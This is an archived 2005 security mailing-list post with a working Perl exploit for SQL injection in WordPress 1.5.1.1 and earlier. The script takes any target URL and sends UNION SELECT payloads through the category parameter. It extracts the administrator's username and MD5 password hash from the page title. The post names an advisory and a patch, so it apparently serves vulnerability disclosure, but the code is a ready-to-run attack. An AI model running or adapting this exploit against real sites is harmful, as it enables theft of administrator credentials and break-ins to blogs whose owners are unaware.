SQL Injection Exploit for WordPress <= 1.5.1.1

From: Alberto Trivero (trivero_at_jumpy.it)
Date: 06/07/05

  • Next message: Reed Arvin: "Denial of Service vulnerability in GoodTech SMTP Server for Windows NT/2000/XP version 5.14" 
    To: <bugtraq@securityfocus.com>, <news@securiteam.com>, <submissions@packetstormsecurity.org>, <submit@milw0rm.com>, <vuln@frsirt.com>
Date: Tue, 7 Jun 2005 21:40:50 +0200

    #!/usr/bin/perl -w
    #
    # SQL Injection Exploit for WordPress <= 1.5.1.1
    # This exploit show the username of the administrator of the blog and his
    password crypted in MD5
    # Related advisory:
    http://www.securityfocus.com/archive/1/401597/30/0/threaded
    # Patch: Download the last version at http://wordpress.org/download/
    # Coded by Alberto Trivero

    use LWP::Simple;

    print "\n\t======================================\n";
    print "\t= Exploit for WordPress <= 1.5.1.1 =\n";
    print "\t= Alberto Trivero - codebug.org =\n";
    print "\t======================================\n\n";

    if(!$ARGV[0] or !($ARGV[0]=~m/http/)) {
       print "Usage:\nperl $0 [full_target_path]\n\n";
       print "Examples:\nperl $0 http://www.example.com/wordpress/\n";
       exit(0);
    }

    $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_login%20FROM
    %20wp_users/*") || die "[-] Unable to retrieve: $!";
    print "[+] Connected to: $ARGV[0]\n";
    $page=~m/<title>.*?&raquo; (.*?)<\/title>/ && print "[+] Username of
    administrator is: $1\n";
    print "[-] Unable to retrieve username\n" if(!$1);
    $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20user_pass%20FROM%
    20wp_users/*") || die "[-] Unable to retrieve: $!";
    $page=~m/<title>.*?&raquo; (.*?)<\/title>/ && print "[+] MD5 hash of
    password is: $1\n";
    print "[-] Unable to retrieve hash of password\n" if(!$1);

  • Next message: Reed Arvin: "Denial of Service vulnerability in GoodTech SMTP Server for Windows NT/2000/XP version 5.14"

    Relevant Pages

    • Re: Way to enable a username w/o admin rights? Figure out who is admin
      ... BLOG --> http://blogs.dirteam.com/blogs/jorge/default.aspx ... We did not have any domain admin passwords, but all was not lost due to the ... someone remembered the username that the Domain Admin had used. ... Administrator username without having Domain Admin rights? ...
      (microsoft.public.windows.server.active_directory)
    • SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2
      ... # This exploit show the username of the administrator of the blog and his ... password crypted in MD5 ... # Coded by Alberto Trivero and Discovered with CorryL ...
      (Bugtraq)
    • Re: Windows 2000 client cant map network drive on windows server 2003
      ... the local username and/or password on the 2000 workstation that is used is ... different from both the xp pro local user and domain user; ... the local administrator account has password of admin ... when the batch file runs it uses the current credentials. ...
      (microsoft.public.windows.server.networking)
    • Re: change from domain to workgroup
      ... Since you can log on as the local administrator, ... You should be able to access most everyting in your old profile ... > username and password. ... > i think it expects that i run the programm with my old username. ...
      (microsoft.public.win2000.general)
    • Re: change from domain to workgroup
      ... Since you can log on as the local administrator, ... You should be able to access most everyting in your old profile ... > username and password. ... > i think it expects that i run the programm with my old username. ...
      (microsoft.public.win2000.security)
    • Quantcast